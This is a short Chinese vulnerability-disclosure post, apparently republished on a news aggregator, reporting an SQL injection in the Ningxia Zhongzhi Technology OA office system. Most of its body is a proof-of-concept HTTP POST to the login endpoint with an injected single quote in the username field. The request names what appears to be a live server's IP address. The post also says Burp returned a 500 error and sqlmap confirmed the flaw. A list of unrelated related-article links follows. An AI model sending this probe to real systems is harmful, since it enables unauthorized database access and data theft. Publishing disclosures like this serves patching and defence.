当前位置: 首页 > article >正文

宁夏众智科技OA办公系统存在SQL注入漏洞

article 2024/10/4 18:39:01

漏洞描述

宁夏众智科技OA办公系统存在SQL注入漏洞

漏洞复现

POC

POST /Account/Login?ACT=Index&CLR=Home HTTP/1.1
Host: 
Content-Length: 45
Cache-Control: max-age=0
Origin: http://39.105.48.206
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://39.105.48.206/Account/Login?ACT=Index&CLR=Home
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive

username=admin%27&password=1&RememberMe=false

bp报错500

sqlmap确认漏洞


http://www.kler.cn/news/332076.html

相关文章:

  • HBase 性能优化 详解
  • GO语言深度探索:并发编程与高性能网络服务器实践
  • 一种简单安全的消息队列的C语言解决方案
  • CDGA|利用人工智能与边缘计算显著提升数据治理效率与效果的实践案例
  • 慢病中医药膳养生食疗管理微信小程序、基于微信小程序的慢病中医药膳养生食疗管理系统设计与实现、中医药膳养生食疗管理微信小程序的开发与应用(源码+文档+定制)
  • C++发邮件:如何轻松实现邮件自动化发送?
  • 828华为云征文|华为云Flexus云服务器X实例部署 即时通讯IM聊天交友软件——高性能服务器实现120W并发连接
  • MySQL 支持行锁还是表锁?分别有哪些优缺点?破解数据库的锁之谜:MySQL行锁与表锁的博弈
  • index.html 调用 ajax
  • 【Bug】STM32F1的PB3和PB4无法正常输出
  • 【案例73】Uclient无法读取https地址添加应用
  • MySQL 实验 3:创建数据表
  • 滚雪球学MySQL[8.2讲]:MySQL事件调度详解:定时任务的创建与管理及使用场景
  • 【web安全】——信息收集
  • cmd命令大全详解
  • Windows11系统下SkyWalking环境搭建教程
  • iSTFT 完美重构的条件详解
  • React -AppVarContext.Provider 提供者组件
  • 【回眸】Tessy 单元测试软件使用指南(四)常见报错及解决方案与批量初始化的经验
  • 浅聊前后端分离开发和前后端不分离开发模式